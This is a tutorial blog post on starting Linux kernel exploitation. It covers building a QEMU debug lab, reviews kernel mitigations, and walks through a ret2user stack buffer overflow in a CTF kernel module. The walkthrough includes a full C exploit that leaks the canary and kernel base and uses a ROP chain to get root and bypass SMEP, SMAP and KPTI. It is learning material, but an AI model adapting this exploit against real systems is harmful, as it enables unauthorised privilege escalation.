Linux Kernel Exploitation: Getting started & BOF
Table of contents
- Motivation
- Where are kernel exploits used?
- Linux kernel oversimplified
- Kernelspace vs Userspace exploitation (x86_64)
Motivation
I started my journey into the Linux kernel exploitation for the following reasons:
- To improve my knowledge of Linux kernel
- Write exploits for real world bugs
- To research IoT devices with modified Linux kernel
- Pwn Google’s kCTF platform
- To get invited to conferences :)
Where are kernel exploits used?
Kernel exploits are used (to my knowledge) by the following groups of people:
- Threat actors: to escalate privileges
- Pentesters: to demonstrate impact
- Defenders: coming up with detections and mitigations
- Kernel / driver developers: to write patches
- Android / iOS superusers: to customize phones
Linux kernel oversimplified
Linux kernel is a layer between user applications and hardware. It manages things like CPU, memory, devices, file system, networking, process control and many other things. It’s a complex project with over 8 million lines of code and it’s still evolving. Such a dynamic project is an ideal research target.
Kernelspace vs Userspace exploitation (x86_64)
If you’re coming from userspace exploitation (like me) you may notice the following differences when writing kernel exploits.
More instructions
Instructions such as:
- LGDT - Loads an address of a GDT into GDTR
- LLDT - Loads an address of a LDT into LDTR
- LTR - Loads a Task Register into TR
- MOV Control Register - Copy data and store in Control Registers
- LMSW - Load a new Machine Status WORD
- CLTS - Clear Task Switch Flag in Control Register CR0
- MOV Debug Register - Copy data and store in debug registers
- INVD - Invalidate Cache without writeback
- INVLPG - Invalidate TLB Entry
- WBINVD - Invalidate Cache with writeback
- HLT - Halt Processor
- RDMSR - Read Model Specific Registers (MSR)
- WRMSR - Write Model Specific Registers (MSR)
- RDPMC - Read Performance Monitoring Counter
- RDTSC - Read time Stamp Counter
With exceptions such as RDTSC which can also be run from userspace if TSD flag in register CR4 is not set.
More registers
When debugging the kernel with gdb we can see additional registers:
- fs_base - base address of fs
- gs_base - base address of gs
- k_gs_base - stores the value of gs_base register while switching from userspace to kernelspace or vice versa
- cr0 - control register
- cr2 - control register
- cr3 - control register
- cr4 - control register
- cr8 - control register
- efer - Extended Feature Enable Register
- mxcsr - control and status for SSE registers
What are the goals of exploitation?
The goal usually revolves around gaining higher privileges on the system or gaining persistence.
Some of the goals can be:
Get root
- payload: commit_creds(prepare_kernel_cred(0))
Escape SECCOMP
- payload: current->thread_info.flags &= ~(1 « TIF_SECCOMP)
Run single command
- payload: run_cmd(“/path_to_command”)
Setup
Install prerequisites
sudo apt install -y bison flex libelf-dev cpio build-essential libssl-dev qemu-system-x86 libncurses-dev
Build the Linux kernel with debug symbols
git clone https://github.com/torvalds/linux # or download specific kernel version from https://mirrors.edge.kernel.org/pub/linux/kernel/
cd linux && make defconfig && make menuconfig
# Ensure that kernel hacking --> Compile-time checks and compiler options --> Compile the kernel with debug symbols is checked.
make -j$(nproc)
Build BusyBox
Download and decompress busybox (I chose the latest version at the time).
wget https://busybox.net/downloads/busybox-1.36.1.tar.bz2
tar xvf busybox-1.36.1.tar.bz2
Build it.
cd busybox-1.36.1
make defconfig
make menuconfig
In the Busybox Settings menu, select Build Options, and check the box next to Build BusyBox as a static binary (no shared libs). Next, specify the output folder.
make
make CONFIG_PREFIX=./../busybox_rootfs install
Build initramfs
Create a directory hierarchy for initramfs.
mkdir -p initramfs/{bin,dev,etc,home,mnt,proc,sys,usr,tmp}
cd initramfs/dev
sudo mknod sda b 8 0
sudo mknod console c 5 1
Copy everything from the busybox_rootfs folder to the initramfs folder. Next, create an init file in the root of initramfs, and write the following into it:
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
/bin/mount -t devtmpfs devtmpfs /dev
chown 1337:1337 /tmp
setsid cttyhack setuidgid 1337 sh
exec /bin/sh
Make the script executable.
chmod +x init
Create initramfs itself.
find . -print0 | cpio --null -ov --format=newc > initramfs.cpio
gzip ./initramfs.cpio
This will create initramfs.cpio.gz
file which we will use as a filesystem for our qemu emulated Linux kernel.
Run with qemu
qemu-system-x86_64 \
-m 512M \
-nographic \
-kernel bzImage \
-append "console=ttyS0 loglevel=3 oops=panic panic=-1 nopti nokaslr" \
-no-reboot \
-cpu qemu64 \
-smp 1 \
-monitor /dev/null \
-initrd initramfs.cpio.gz \
-net nic,model=virtio \
-net user \
-gdb tcp::1234 \
-S
Flag -gdb tcp::1234
sets gdbstub listener on port 1234. The -S
flag halts the qemu execution until gdb debugger is connected.
Debugging
For debugging run the qemu instance with the -gdb and -S flag. Open gdb in another terminal and write:
target remote :1234
As for gdb extensions use which ever extension works, I use gef, although most of the things can be accomplished with plain gdb.
Shellcoding
If you know what you want to accomplish with code but don’t know how to do it on assembly level, write a kernel module, compile it and dump the assembly.
objdump -M intel -d test.ko
Kernel modules
Kernel modules are programs that can be loaded and unloaded into the kernel on the fly without the need to reboot the system. They are a great start for learning kernel exploitation as they run with kernel privileges.
To load a kernel module you can use:
sudo insmod <module_name.ko>
To unload a kernel module:
sudo rmmod <module_name>
To list currently loaded modules:
lsmod
All kernel modules have a struct called fops (file operations) which specifies which functions are called upon calling read, write, open, close or ioctl functions.
static struct file_operations module_fops =
{
.owner = THIS_MODULE,
.read = module_read,
.write = module_write,
.open = module_open,
.release = module_close,
};
We can start auditing each of these functions in our search for bugs.
Mitigations
- KASLR - randomizes base address of the kernel (same as userspace ASLR)
- FG-KASLR - randomizes base address of every function
- Kernel Stack Canary - value is placed on the stack before return address, this prevents some buffer overflow attacks (same as userspace)
- SMEP - Supervisor Mode Execution Prevention prevents executing code stored in userspace from kernelspace
- SMAP - Supervisor Mode Access Prevention prevents accessing memory from userspace while in kernelspace
- KPTI - Kernel Page Tables Isolation is a mitigation against Meltdown CPU bug
More mitigations can be found at https://github.com/a13xp0p0v/linux-kernel-defence-map
Ret2user
Let’s take a look at the ret2user technique which is commonly used to escalate privileges. For this example I chose a challenge from K3RN3LCTF 2021 called easy_kernel which can be downloaded here: https://github.com/seal9055/seal9055.github.io/blob/main/docs/kernel/kernel_rop.tar.gz
Vulnerability analysis
As I mentioned before, kernel modules are a great way to start learning Linux kernel exploitation. In this challenge we are provided with vulnerable kernel module vuln.ko
and we have source code in vuln.c
.
Analyzing s_read
function we notice a fixed size message buffer.
static ssize_t s_read(struct file *file, char __user *ubuf, size_t size, loff_t *offset)
{
char message[40];
strcpy(message, "Welcome to this kernel pwn series");
if (raw_copy_to_user(ubuf, message, size) == 0) {
printk(KERN_ALERT "%ld bytes read by device\n", size);
}
else {
printk(KERN_ALERT "Some error occured in read\n");
}
return size;
}
If we read more than 40 chars from the message buffer we have a memory leak. This is useful for bypassing KASLR and Kernel Stack Canaries.
Analyzing s_write
function we notice it’s similar but instead of reading we write values into the buffer.
static ssize_t s_write(struct file *file, const char __user *ubuf, size_t size, loff_t *offset)
{
char buffer[40];
if (raw_copy_from_user(buffer, ubuf, size) == 0) {
printk(KERN_ALERT "%ld bytes written to device\n", size);
}
else {
printk(KERN_ALERT "Some error occured in write\n");
}
return size;
}
Calling this function and passing it more than 40 bytes we can trigger buffer overflow.
Exploitation
We have everything we need to start writing an exploit. Since this setup has no libc we can compile the binary statically and pack it into initramfs file system.
This is the plan for writing an exploit:
- Leak Kernel Stack Canary
- Leak kernel address to bypass KASLR
- Save state for switching context between user-land and kernel-land (save registers for restoring them later)
- Write ROP chain to bypass SMEP (Execution Prevention) and trigger buffer overflow
- Get shell with
system("/bin/sh")
- Register SIGSEGV signal handler for KPTI bypass (otherwise the exploit Segfaults which is part of KPTI protection)
Below is an example of an exploit utilizing ret2user technique and bypassing KASLR, Kernel Stack Canary, SMEP, SMAP, KPTI:
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
void spawn_shell() {
puts("[+] Returned to userland");
if (getuid() == 0) system("/bin/sh");
else puts("[-] Not root");
}
unsigned long user_cs, user_ss, user_rflags, user_rsp;
int main() {
// KPTI bypass
signal(SIGSEGV, spawn_shell);
int fd = open("/proc/pwn_device", O_RDWR);
if (fd < 0) {
puts("[-] Failed to open device");
exit(1);
}
puts("[+] Opened device");
// Leak
unsigned long buff[80] = {0};
read(fd, buff, 64);
unsigned long cookie = buff[5];
unsigned long base = buff[7] - 0x25de2e;
printf("[+] Leaked cookie: 0x%lx\n", cookie);
printf("[+] Leaked base: 0x%lx\n", base);
// Save state
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_rsp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
// Overflow
unsigned long payload[40] = {[0 ... 39] = 0x4141414141414141};
int i = 5;
payload[i] = cookie;
++i;
payload[++i] = base + 0x001778; // pop rdi; ret;
payload[++i] = 0x0;
payload[++i] = base + 0x08c340; // prepare_kernel_cred
payload[++i] = base + 0x08bf00; // commit_creds
payload[++i] = base + 0xc00f58; // swapgs; ret;
payload[++i] = base + 0x024952; // iretq; ret;
payload[++i] = (unsigned long)spawn_shell; // userland rip
payload[++i] = user_cs;
payload[++i] = user_rflags;
payload[++i] = user_rsp;
payload[++i] = user_ss;
write(fd, payload, sizeof payload);
return 0;
}
Video
Below is a video of a talk I gave at BSidesLjubljana in June 2023.
References
https://medium.com/@kiky.tokamuro/creating-initramfs-5cca9b524b5a
https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/
https://sam4k.com/linternals-memory-allocators-0x02/
https://lkmidas.github.io/posts/20210205-linux-kernel-pwn-part-3/
https://seal9055.com/blog/kernel/return_oriented_programming
https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628
https://pwn.college/system-security/kernel-security
https://github.com/google/syzkaller/
https://research.nccgroup.com/2018/09/11/ncc-groups-exploit-development-capability-why-and-what/
https://lwn.net/Articles/824307/